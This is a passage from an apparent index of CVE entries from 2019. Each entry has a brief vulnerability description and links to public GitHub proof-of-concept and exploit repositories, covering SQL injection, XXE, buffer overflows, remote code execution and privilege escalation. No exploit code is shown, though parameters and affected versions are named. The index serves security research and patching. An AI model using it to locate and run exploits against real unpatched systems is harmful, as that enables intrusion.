- [SecKatie/CVE-2019-8978](https://github.com/SecKatie/CVE-2019-8978)
### CVE-2019-8979 (2019-02-21)
Kohana through 3.3.6 has SQL Injection when the order_by() parameter can be controlled.
- [elttam/ko7demo](https://github.com/elttam/ko7demo)
### CVE-2019-8985 (2019-02-21)
On Netis WF2411 with firmware 2.1.36123 and other Netis WF2xxx devices (possibly WF2411 through WF2880), there is a stack-based buffer overflow that does not require authentication. This can cause denial of service (device restart) or remote code execution. This vulnerability can be triggered by a GET request with a long HTTP "Authorization: Basic" header that is mishandled by user_auth->user_ok in /bin/boa.
- [Squirre17/CVE-2019-8985](https://github.com/Squirre17/CVE-2019-8985)
### CVE-2019-8997 (2019-03-21)
An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field.
- [nxkennedy/CVE-2019-8997](https://github.com/nxkennedy/CVE-2019-8997)
### CVE-2019-9053 (2019-03-26)
An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1_idlist parameter.
- [SUNNYSAINI01001/46635.py_CVE-2019-9053](https://github.com/SUNNYSAINI01001/46635.py_CVE-2019-9053)
- [h3xcr4ck3r/CVE-2019-9053](https://github.com/h3xcr4ck3r/CVE-2019-9053)
- [maraspiras/46635.py](https://github.com/maraspiras/46635.py)
- [e-renna/CVE-2019-9053](https://github.com/e-renna/CVE-2019-9053)
- [zmiddle/Simple_CMS_SQLi](https://github.com/zmiddle/Simple_CMS_SQLi)
- [ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit](https://github.com/ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit)
- [pedrojosenavasperez/CVE-2019-9053-Python3](https://github.com/pedrojosenavasperez/CVE-2019-9053-Python3)
- [Mahamedm/CVE-2019-9053-Exploit-Python-3](https://github.com/Mahamedm/CVE-2019-9053-Exploit-Python-3)
- [im-suman-roy/CVE-2019-9053](https://github.com/im-suman-roy/CVE-2019-9053)
- [bthnrml/guncel-cve-2019-9053.py](https://github.com/bthnrml/guncel-cve-2019-9053.py)
- [kahluri/CVE-2019-9053](https://github.com/kahluri/CVE-2019-9053)
- [Doc0x1/CVE-2019-9053-Python3](https://github.com/Doc0x1/CVE-2019-9053-Python3)
- [fernandobortotti/CVE-2019-9053](https://github.com/fernandobortotti/CVE-2019-9053)
- [byrek/CVE-2019-9053](https://github.com/byrek/CVE-2019-9053)
- [davcwikla/CVE-2019-9053-exploit](https://github.com/davcwikla/CVE-2019-9053-exploit)
- [BjarneVerschorre/CVE-2019-9053](https://github.com/BjarneVerschorre/CVE-2019-9053)
- [Jason-Siu/CVE-2019-9053-Exploit-in-Python-3](https://github.com/Jason-Siu/CVE-2019-9053-Exploit-in-Python-3)
- [FedericoTorres233/CVE-2019-9053-Fixed](https://github.com/FedericoTorres233/CVE-2019-9053-Fixed)
- [Dh4nuJ4/SimpleCTF-UpdatedExploit](https://github.com/Dh4nuJ4/SimpleCTF-UpdatedExploit)
- [TeymurNovruzov/CVE-2019-9053-python3-remastered](https://github.com/TeymurNovruzov/CVE-2019-9053-python3-remastered)
- [jtoalu/CTF-CVE-2019-9053-GTFOBins](https://github.com/jtoalu/CTF-CVE-2019-9053-GTFOBins)
- [Azrenom/CMS-Made-Simple-2.2.9-CVE-2019-9053](https://github.com/Azrenom/CMS-Made-Simple-2.2.9-CVE-2019-9053)
- [louisthedonothing/CVE-2019-9053](https://github.com/louisthedonothing/CVE-2019-9053)
### CVE-2019-9081
- [nth347/CVE-2019-9081_PoC](https://github.com/nth347/CVE-2019-9081_PoC)
- [scopion/cve-2019-9081](https://github.com/scopion/cve-2019-9081)
- [qafdevsec/CVE-2019-9081_PoC](https://github.com/qafdevsec/CVE-2019-9081_PoC)
### CVE-2019-9153 (2019-08-22)
Improper Verification of a Cryptographic Signature in OpenPGP.js <=4.1.2 allows an attacker to forge signed messages by replacing its signatures with a "standalone" or "timestamp" signature.
- [ZenyWay/opgp-service-cve-2019-9153](https://github.com/ZenyWay/opgp-service-cve-2019-9153)
### CVE-2019-9184 (2019-02-26)
SQL injection vulnerability in the J2Store plugin 3.x before 3.3.7 for Joomla! allows remote attackers to execute arbitrary SQL commands via the product_option[] parameter.
- [cved-sources/cve-2019-9184](https://github.com/cved-sources/cve-2019-9184)
### CVE-2019-9193 (2019-04-01)
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
- [wkjung0624/cve-2019-9193](https://github.com/wkjung0624/cve-2019-9193)
- [b4keSn4ke/CVE-2019-9193](https://github.com/b4keSn4ke/CVE-2019-9193)
- [chromanite/CVE-2019-9193-PostgreSQL-9.3-11.7](https://github.com/chromanite/CVE-2019-9193-PostgreSQL-9.3-11.7)
- [paulotrindadec/CVE-2019-9193](https://github.com/paulotrindadec/CVE-2019-9193)
- [geniuszlyy/CVE-2019-9193](https://github.com/geniuszlyy/CVE-2019-9193)
- [AxthonyV/CVE-2019-9193](https://github.com/AxthonyV/CVE-2019-9193)
- [A0be/CVE-2019-9193](https://github.com/A0be/CVE-2019-9193)
### CVE-2019-9194 (2019-02-26)
elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
- [cved-sources/cve-2019-9194](https://github.com/cved-sources/cve-2019-9194)
### CVE-2019-9202 (2019-03-28)
Nagios IM (component of Nagios XI) before 2.2.7 allows authenticated users to execute arbitrary code via API key issues.
- [polict/CVE-2019-9202](https://github.com/polict/CVE-2019-9202)
### CVE-2019-9465 (2020-01-07)
In the Titan M handling of cryptographic operations, there is a possible information disclosure due to an unusual root cause. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-10 Android ID: A-133258003
- [alexbakker/CVE-2019-9465](https://github.com/alexbakker/CVE-2019-9465)
- [MichaelsPlayground/CVE-2019-9465](https://github.com/MichaelsPlayground/CVE-2019-9465)
### CVE-2019-9506 (2019-08-14)
The Bluetooth BR/EDR specification up to and including version 5.1 permits sufficiently low encryption key length and does not prevent an attacker from influencing the key length negotiation. This allows practical brute-force attacks (aka "KNOB") that can decrypt traffic and inject arbitrary ciphertext without the victim noticing.
- [francozappa/knob](https://github.com/francozappa/knob)
### CVE-2019-9511 (2019-08-13)
Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.
- [flyniu666/ingress-nginx-0.21-1.19.5](https://github.com/flyniu666/ingress-nginx-0.21-1.19.5)
### CVE-2019-9580 (2019-03-09)
In st2web in StackStorm Web UI before 2.9.3 and 2.10.x before 2.10.3, it is possible to bypass the CORS protection mechanism via a "null" origin value, potentially leading to XSS.
- [mpgn/CVE-2019-9580](https://github.com/mpgn/CVE-2019-9580)
### CVE-2019-9596 (2019-10-23)
Darktrace Enterprise Immune System before 3.1 allows CSRF via the /whitelisteddomains endpoint.
- [gerwout/CVE-2019-9596-and-CVE-2019-9597](https://github.com/gerwout/CVE-2019-9596-and-CVE-2019-9597)
### CVE-2019-9599 (2019-03-06)
The AirDroid application through 4.2.1.6 for Android allows remote attackers to cause a denial of service (service crash) via many simultaneous sdctl/comm/lite_auth/ requests.
- [s4vitar/AirDroidPwner](https://github.com/s4vitar/AirDroidPwner)
### CVE-2019-9621 (2019-04-30)
Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
- [k8gege/ZimbraExploit](https://github.com/k8gege/ZimbraExploit)
### CVE-2019-9653 (2019-05-31)
NUUO Network Video Recorder Firmware 1.7.x through 3.3.x allows unauthenticated attackers to execute arbitrary commands via shell metacharacters to handle_load_config.php.
- [grayoneday/CVE-2019-9653](https://github.com/grayoneday/CVE-2019-9653)
### CVE-2019-9670 (2019-05-29)
mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability, as demonstrated by Autodiscover/Autodiscover.xml.
- [rek7/Zimbra-RCE](https://github.com/rek7/Zimbra-RCE)
- [attackgithub/Zimbra-RCE](https://github.com/attackgithub/Zimbra-RCE)
- [oppsec/arbimz](https://github.com/oppsec/arbimz)
- [oppsec/zaber](https://github.com/oppsec/zaber)
- [Cappricio-Securities/CVE-2019-9670](https://github.com/Cappricio-Securities/CVE-2019-9670)
- [OracleNep/CVE-2019-9670-DtdFilegeneration](https://github.com/OracleNep/CVE-2019-9670-DtdFilegeneration)
### CVE-2019-9673 (2019-06-05)
Freenet 1483 has a MIME type bypass that allows arbitrary JavaScript execution via a crafted Freenet URI.
- [mgrube/CVE-2019-9673](https://github.com/mgrube/CVE-2019-9673)
### CVE-2019-9729 (2019-03-12)
In Shanda MapleStory Online V160, the SdoKeyCrypt.sys driver allows privilege escalation to NT AUTHORITY\SYSTEM because of not validating the IOCtl 0x8000c01c input value, leading to an integer signedness error and a heap-based buffer underflow.
- [HyperSine/SdoKeyCrypt-sys-local-privilege-elevation](https://github.com/HyperSine/SdoKeyCrypt-sys-local-privilege-elevation)
- [timeowilliamsq/HyperSine](https://github.com/timeowilliamsq/HyperSine)
- [recozone/HyperSine](https://github.com/recozone/HyperSine)
- [huangyutange0uywlcn/HyperSine](https://github.com/huangyutange0uywlcn/HyperSine)
### CVE-2019-9730 (2019-06-05)
Incorrect access control in the CxUtilSvc component of the Synaptics Sound Device drivers prior to version 2.29 allows a local attacker to increase access privileges to the Windows Registry via an unpublished API.
- [jthuraisamy/CVE-2019-9730](https://github.com/jthuraisamy/CVE-2019-9730)
### CVE-2019-9745 (2019-10-14)
CloudCTI HIP Integrator Recognition Configuration Tool allows privilege escalation via its EXQUISE integration. This tool communicates with a service (Recognition Update Client Service) via an insecure communication channel (Named Pipe). The data (JSON) sent via this channel is used to import data from CRM software using plugins (.dll files). The plugin to import data from the EXQUISE software (DatasourceExquiseExporter.dll) can be persuaded to start arbitrary programs (including batch files) that are executed using the same privileges as Recognition Update Client Service (NT AUTHORITY\SYSTEM), thus elevating privileges. This occurs because a higher-privileged process executes scripts from a directory writable by a lower-privileged user.
- [KPN-CISO/CVE-2019-9745](https://github.com/KPN-CISO/CVE-2019-9745)
### CVE-2019-9766 (2019-03-14)
Stack-based buffer overflow in Free MP3 CD Ripper 2.6, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .mp3 file.
- [moonheadobj/CVE-2019-9766](https://github.com/moonheadobj/CVE-2019-9766)
- [zeronohacker/CVE-2019-9766](https://github.com/zeronohacker/CVE-2019-9766)
### CVE-2019-9787 (2019-03-14)
WordPress before 5.1.1 does not properly filter comment content, leading to Remote Code Execution by unauthenticated users in a default configuration. This occurs because CSRF protection is mishandled, and because Search Engine Optimization of A elements is performed incorrectly, leading to XSS. The XSS results in administrative access, which allows arbitrary changes to .php files. This is related to wp-admin/includes/ajax-actions.php and wp-includes/comment.php.
- [rkatogit/cve-2019-9787_csrf_poc](https://github.com/rkatogit/cve-2019-9787_csrf_poc)
- [PalmTreeForest/CodePath_Week_7-8](https://github.com/PalmTreeForest/CodePath_Week_7-8)
- [sijiahi/Wordpress_cve-2019-9787_defense](https://github.com/sijiahi/Wordpress_cve-2019-9787_defense)
- [matinciel/Wordpress_CVE-2019-9787](https://github.com/matinciel/Wordpress_CVE-2019-9787)
- [dexXxed/CVE-2019-9787](https://github.com/dexXxed/CVE-2019-9787)
- [kuangting4231/mitigation-cve-2019-9787](https://github.com/kuangting4231/mitigation-cve-2019-9787)
### CVE-2019-9791 (2019-04-26)
The type inference system allows the compilation of functions that can cause type confusions between arbitrary objects when compiled through the IonMonkey just-in-time (JIT) compiler and when the constructor function is entered through on-stack replacement (OSR). This allows for possible arbitrary reading and writing of objects during an exploitable crash. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66.
- [Sp0pielar/CVE-2019-9791](https://github.com/Sp0pielar/CVE-2019-9791)
### CVE-2019-9810 (2019-04-26)
Incorrect alias information in IonMonkey JIT compiler for Array.prototype.slice method may lead to missing bounds check and a buffer overflow. This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1.
- [xuechiyaobai/CVE-2019-9810-PoC](https://github.com/xuechiyaobai/CVE-2019-9810-PoC)
- [0vercl0k/CVE-2019-9810](https://github.com/0vercl0k/CVE-2019-9810)
### CVE-2019-9849 (2019-07-17)
LibreOffice has a 'stealth mode' in which only documents from locations deemed 'trusted' are allowed to retrieve remote resources. This mode is not the default mode, but can be enabled by users who want to disable LibreOffice's ability to include remote resources within a document. A flaw existed where bullet graphics were omitted from this protection prior to version 6.2.5. This issue affects: Document Foundation LibreOffice versions prior to 6.2.5.
- [mbadanoiu/CVE-2019-9849](https://github.com/mbadanoiu/CVE-2019-9849)
### CVE-2019-9896 (2019-03-21)
In PuTTY versions before 0.71 on Windows, local attackers could hijack the application by putting a malicious help file in the same directory as the executable.
- [yasinyilmaz/vuln-chm-hijack](https://github.com/yasinyilmaz/vuln-chm-hijack)
### CVE-2019-9978 (2019-03-24)
The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
- [mpgn/CVE-2019-9978](https://github.com/mpgn/CVE-2019-9978)
- [hash3liZer/CVE-2019-9978](https://github.com/hash3liZer/CVE-2019-9978)
- [KTN1990/CVE-2019-9978](https://github.com/KTN1990/CVE-2019-9978)
- [cved-sources/cve-2019-9978](https://github.com/cved-sources/cve-2019-9978)
- [d3fudd/CVE-2019-9978_Exploit](https://github.com/d3fudd/CVE-2019-9978_Exploit)
- [grimlockx/CVE-2019-9978](https://github.com/grimlockx/CVE-2019-9978)
- [h8handles/CVE-2019-9978-Python3](https://github.com/h8handles/CVE-2019-9978-Python3)
- [0xMoonrise/cve-2019-9978](https://github.com/0xMoonrise/cve-2019-9978)
- [MAHajian/CVE-2019-9978](https://github.com/MAHajian/CVE-2019-9978)
### CVE-2019-10008 (2019-04-24)
Zoho ManageEngine ServiceDesk 9.3 allows session hijacking and privilege escalation because an established guest session is automatically converted into an established administrator session when the guest user enters the administrator username, with an arbitrary incorrect password, in an mc/ login attempt within a different browser tab.
- [ignis-sec/CVE-2019-10008](https://github.com/ignis-sec/CVE-2019-10008)
### CVE-2019-10086 (2019-08-20)
In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by default characteristic of the PropertyUtilsBean.
- [evilangelplus/CVE-2019-10086](https://github.com/evilangelplus/CVE-2019-10086)
### CVE-2019-10092 (2019-09-26)
In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.
- [motikan2010/CVE-2019-10092_Docker](https://github.com/motikan2010/CVE-2019-10092_Docker)
- [mbadanoiu/CVE-2019-10092](https://github.com/mbadanoiu/CVE-2019-10092)
### CVE-2019-10149 (2019-06-05)
A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.
- [bananaphones/exim-rce-quickfix](https://github.com/bananaphones/exim-rce-quickfix)
- [cowbe0x004/eximrce-CVE-2019-10149](https://github.com/cowbe0x004/eximrce-CVE-2019-10149)
- [MNEMO-CERT/PoC--CVE-2019-10149_Exim](https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim)
- [aishee/CVE-2019-10149-quick](https://github.com/aishee/CVE-2019-10149-quick)
- [AzizMea/CVE-2019-10149-privilege-escalation](https://github.com/AzizMea/CVE-2019-10149-privilege-escalation)
- [Brets0150/StickyExim](https://github.com/Brets0150/StickyExim)
- [Chris-dev1/exim.exp](https://github.com/Chris-dev1/exim.exp)
- [darsigovrustam/CVE-2019-10149](https://github.com/darsigovrustam/CVE-2019-10149)
- [Diefunction/CVE-2019-10149](https://github.com/Diefunction/CVE-2019-10149)
- [Dilshan-Eranda/CVE-2019-10149](https://github.com/Dilshan-Eranda/CVE-2019-10149)
- [cloudflare/exim-cve-2019-10149-data](https://github.com/cloudflare/exim-cve-2019-10149-data)
- [Stick-U235/CVE-2019-10149-Exploit](https://github.com/Stick-U235/CVE-2019-10149-Exploit)
- [rahmadsandy/EXIM-4.87-CVE-2019-10149](https://github.com/rahmadsandy/EXIM-4.87-CVE-2019-10149)
- [hyim0810/CVE-2019-10149](https://github.com/hyim0810/CVE-2019-10149)
- [qlusec/CVE-2019-10149](https://github.com/qlusec/CVE-2019-10149)
### CVE-2019-10172 (2019-11-18)
A flaw was found in org.codehaus.jackson:jackson-mapper-asl:1.9.x libraries. XML external entity vulnerabilities similar CVE-2016-3720 also affects codehaus jackson-mapper-asl libraries but in different classes.
- [rusakovichma/CVE-2019-10172](https://github.com/rusakovichma/CVE-2019-10172)
### CVE-2019-10207 (2019-11-25)
A flaw was found in the Linux kernel's Bluetooth implementation of UART, all versions kernel 3.x.x before 4.18.0 and kernel 5.x.x. An attacker with local access and write permissions to the Bluetooth hardware could use this flaw to issue a specially crafted ioctl function call and cause the system to crash.
- [butterflyhack/CVE-2019-10207](https://github.com/butterflyhack/CVE-2019-10207)
### CVE-2019-10220 (2019-11-27)
Linux kernel CIFS implementation, version 4.9.0 is vulnerable to a relative paths injection in directory entry lists.
- [Trinadh465/linux-3.0.35_CVE-2019-10220](https://github.com/Trinadh465/linux-3.0.35_CVE-2019-10220)
- [hshivhare67/kernel_v4.1.15_CVE-2019-10220](https://github.com/hshivhare67/kernel_v4.1.15_CVE-2019-10220)
### CVE-2019-10392 (2019-09-12)
Jenkins Git Client Plugin 2.8.4 and earlier and 3.0.0-rc did not properly restrict values passed as URL argument to an invocation of 'git ls-remote', resulting in OS command injection.
- [jas502n/CVE-2019-10392](https://github.com/jas502n/CVE-2019-10392)
- [ftk-sostupid/CVE-2019-10392_EXP](https://github.com/ftk-sostupid/CVE-2019-10392_EXP)
### CVE-2019-10475 (2019-10-23)
A reflected cross-site scripting vulnerability in Jenkins build-metrics Plugin allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin.
- [vesche/CVE-2019-10475](https://github.com/vesche/CVE-2019-10475)
### CVE-2019-10678 (2019-03-31)
Domoticz before 4.10579 neglects to categorize \n and \r as insecure argument options.
- [cved-sources/cve-2019-10678](https://github.com/cved-sources/cve-2019-10678)
### CVE-2019-10685 (2019-05-24)
A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Heidelberg Prinect Archiver v2013 release 1.0.
- [alt3kx/CVE-2019-10685](https://github.com/alt3kx/CVE-2019-10685)
### CVE-2019-10708 (2019-04-02)
S-CMS PHP v1.0 has SQL injection via the 4/js/scms.php?action=unlike id parameter.
- [stavhaygn/CVE-2019-10708](https://github.com/stavhaygn/CVE-2019-10708)
### CVE-2019-10742 (2019-05-07)
Axios up to and including 0.18.0 allows attackers to cause a denial of service (application crash) by continuing to accepting content after maxContentLength is exceeded.
- [Viniciuspxf/CVE-2019-10742](https://github.com/Viniciuspxf/CVE-2019-10742)
### CVE-2019-10758 (2019-12-24)
mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.
- [masahiro331/CVE-2019-10758](https://github.com/masahiro331/CVE-2019-10758)
- [lp008/CVE-2019-10758](https://github.com/lp008/CVE-2019-10758)
### CVE-2019-10760 (2019-10-15)
safer-eval before 1.3.2 are vulnerable to Arbitrary Code Execution. A payload using constructor properties can escape the sandbox and execute arbitrary code.
- [lirantal/safer-eval-cve-CVE-2019-10760](https://github.com/lirantal/safer-eval-cve-CVE-2019-10760)
### CVE-2019-10779 (2020-01-28)
All versions of stroom:stroom-app before 5.5.12 and all versions of the 6.0.0 branch before 6.0.25 are affected by Cross-site Scripting. An attacker website is able to load the Stroom UI into a hidden iframe. Using that iframe, the attacker site can issue commands to the Stroom UI via an XSS vulnerability to take full control of the Stroom UI on behalf of the logged-in user.
- [RepublicR0K/CVE-2019-10779](https://github.com/RepublicR0K/CVE-2019-10779)
### CVE-2019-10869 (2019-05-07)
Path Traversal and Unrestricted File Upload exists in the Ninja Forms plugin before 3.0.23 for WordPress (when the Uploads add-on is activated). This allows an attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) name and tmp_name parameters.
- [KTN1990/CVE-2019-10869](https://github.com/KTN1990/CVE-2019-10869)
### CVE-2019-10915 (2019-07-11)
A vulnerability has been identified in TIA Administrator (All versions < V1.0 SP1 Upd1). The integrated configuration web application (TIA Administrator) allows to execute certain application commands without proper authentication. The vulnerability could be exploited by an attacker with local access to the affected system. Successful exploitation requires no privileges and no user interaction. An attacker could use the vulnerability to compromise confidentiality and integrity and availability of the affected system. At the time of advisory publication no public exploitation of this security vulnerability was known.
- [jiansiting/CVE-2019-10915](https://github.com/jiansiting/CVE-2019-10915)
### CVE-2019-10945 (2019-04-10)
An issue was discovered in Joomla! before 3.9.5. The Media Manager component does not properly sanitize the folder parameter, allowing attackers to act outside the media manager root directory.
- [dpgg101/CVE-2019-10945](https://github.com/dpgg101/CVE-2019-10945)
### CVE-2019-10999 (2019-05-06)
The D-Link DCS series of Wi-Fi cameras contains a stack-based buffer overflow in alphapd, the camera's web server. The overflow allows a remotely authenticated attacker to execute arbitrary code by providing a long string in the WEPEncryption parameter when requesting wireless.htm. Vulnerable devices include DCS-5009L (1.08.11 and below), DCS-5010L (1.14.09 and below), DCS-5020L (1.15.12 and below), DCS-5025L (1.03.07 and below), DCS-5030L (1.04.10 and below), DCS-930L (2.16.01 and below), DCS-931L (1.14.11 and below), DCS-932L (2.17.01 and below), DCS-933L (1.14.11 and below), and DCS-934L (1.05.04 and below).
- [tacnetsol/CVE-2019-10999](https://github.com/tacnetsol/CVE-2019-10999)
- [qjh2333/CVE-2019-10999](https://github.com/qjh2333/CVE-2019-10999)
### CVE-2019-11043 (2019-10-28)
In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.
- [neex/phuip-fpizdam](https://github.com/neex/phuip-fpizdam)
- [B1gd0g/CVE-2019-11043](https://github.com/B1gd0g/CVE-2019-11043)
- [tinker-li/CVE-2019-11043](https://github.com/tinker-li/CVE-2019-11043)
- [jas502n/CVE-2019-11043](https://github.com/jas502n/CVE-2019-11043)
- [AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-](https://github.com/AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-)
- [ianxtianxt/CVE-2019-11043](https://github.com/ianxtianxt/CVE-2019-11043)
- [fairyming/CVE-2019-11043](https://github.com/fairyming/CVE-2019-11043)
- [akamajoris/CVE-2019-11043-Docker](https://github.com/akamajoris/CVE-2019-11043-Docker)
- [theMiddleBlue/CVE-2019-11043](https://github.com/theMiddleBlue/CVE-2019-11043)
- [shadow-horse/cve-2019-11043](https://github.com/shadow-horse/cve-2019-11043)
- [huowen/CVE-2019-11043](https://github.com/huowen/CVE-2019-11043)
- [ypereirareis/docker-CVE-2019-11043](https://github.com/ypereirareis/docker-CVE-2019-11043)
- [MRdoulestar/CVE-2019-11043](https://github.com/MRdoulestar/CVE-2019-11043)
- [0th3rs-Security-Team/CVE-2019-11043](https://github.com/0th3rs-Security-Team/CVE-2019-11043)
- [k8gege/CVE-2019-11043](https://github.com/k8gege/CVE-2019-11043)
- [moniik/CVE-2019-11043_env](https://github.com/moniik/CVE-2019-11043_env)
- [kriskhub/CVE-2019-11043](https://github.com/kriskhub/CVE-2019-11043)
- [alokaranasinghe/cve-2019-11043](https://github.com/alokaranasinghe/cve-2019-11043)
- [corifeo/CVE-2019-11043](https://github.com/corifeo/CVE-2019-11043)
- [lindemer/CVE-2019-11043](https://github.com/lindemer/CVE-2019-11043)
- [jptr218/php_hack](https://github.com/jptr218/php_hack)
- [jas9reet/CVE-2019-11043](https://github.com/jas9reet/CVE-2019-11043)
### CVE-2019-11061 (2019-08-29)
A broken access control vulnerability in HG100 firmware versions up to 4.00.06 allows an attacker in the same local area network to control IoT devices that connect with itself via http://[target]/smarthome/devicecontrol without any authentication. CVSS 3.0 base score 10 (Confidentiality, Integrity and Availability impacts). CVSS vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
- [tim124058/ASUS-SmartHome-Exploit](https://github.com/tim124058/ASUS-SmartHome-Exploit)
### CVE-2019-11076 (2019-04-23)
Cribl UI 1.5.0 allows remote attackers to run arbitrary commands via an unauthenticated web request.
- [livehybrid/poc-cribl-rce](https://github.com/livehybrid/poc-cribl-rce)
### CVE-2019-11157 (2019-12-16)
Improper conditions check in voltage settings for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege and/or information disclosure via local access.
- [zkenjar/v0ltpwn](https://github.com/zkenjar/v0ltpwn)
### CVE-2019-11223 (2019-04-18)
An Unrestricted File Upload Vulnerability in the SupportCandy plugin through 2.0.0 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension.
- [AngelCtulhu/CVE-2019-11223](https://github.com/AngelCtulhu/CVE-2019-11223)
### CVE-2019-11224 (2019-05-15)
HARMAN AMX MVP5150 v2.87.13 devices allow remote OS Command Injection.
- [Insecurities/CVE-2019-11224](https://github.com/Insecurities/CVE-2019-11224)
### CVE-2019-11358 (2019-04-19)
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
- [DanielRuf/snyk-js-jquery-174006](https://github.com/DanielRuf/snyk-js-jquery-174006)
- [bitnesswise/jquery-prototype-pollution-fix](https://github.com/bitnesswise/jquery-prototype-pollution-fix)
- [DanielRuf/snyk-js-jquery-565129](https://github.com/DanielRuf/snyk-js-jquery-565129)
- [chrisneagu/FTC-Skystone-Dark-Angels-Romania-2020](https://github.com/chrisneagu/FTC-Skystone-Dark-Angels-Romania-2020)
- [Snorlyd/https-nj.gov---CVE-2019-11358](https://github.com/Snorlyd/https-nj.gov---CVE-2019-11358)
- [isacaya/CVE-2019-11358](https://github.com/isacaya/CVE-2019-11358)
### CVE-2019-11395 (2019-04-21)
A buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long string, as demonstrated by SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR.
- [RedAlien00/CVE-2019-11395](https://github.com/RedAlien00/CVE-2019-11395)
- [caioprince/CVE-2019-11395](https://github.com/caioprince/CVE-2019-11395)
### CVE-2019-11408 (2019-06-17)
XSS in app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 allows remote unauthenticated attackers to inject arbitrary JavaScript characters by placing a phone call using a specially crafted caller ID number. This can further lead to remote code execution by chaining this vulnerability with a command injection vulnerability also present in FusionPBX.
- [HoseynHeydari/fusionpbx_rce_vulnerability](https://github.com/HoseynHeydari/fusionpbx_rce_vulnerability)
### CVE-2019-11447 (2019-04-22)
An issue was discovered in CutePHP CuteNews 2.1.2. An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal. There is no effective control of $imgsize in /core/modules/dashboard.php. The header content of a file can be changed and the control can be bypassed for code execution. (An attacker can use the GIF header for this.)
- [mt-code/CVE-2019-11447](https://github.com/mt-code/CVE-2019-11447)
- [khuntor/CVE-2019-11447-EXP](https://github.com/khuntor/CVE-2019-11447-EXP)
- [dinesh876/CVE-2019-11447-POC](https://github.com/dinesh876/CVE-2019-11447-POC)
- [ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE](https://github.com/ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE)
- [thewhiteh4t/cve-2019-11447](https://github.com/thewhiteh4t/cve-2019-11447)
- [0xConstant/CVE-2019-11447](https://github.com/0xConstant/CVE-2019-11447)
- [substing/CVE-2019-11447_reverse_shell_upload](https://github.com/substing/CVE-2019-11447_reverse_shell_upload)
- [CRFSlick/CVE-2019-11447-POC](https://github.com/CRFSlick/CVE-2019-11447-POC)
- [ojo5/CVE-2019-11447.c](https://github.com/ojo5/CVE-2019-11447.c)
### CVE-2019-11477 (2019-06-18)
Jonathan Looney discovered that the TCP_SKB_CB(skb)->tcp_gso_segs value was subject to an integer overflow in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit 3b4929f65b0d8249f19a50245cd88ed1a2f78cff.
- [sasqwatch/cve-2019-11477-poc](https://github.com/sasqwatch/cve-2019-11477-poc)
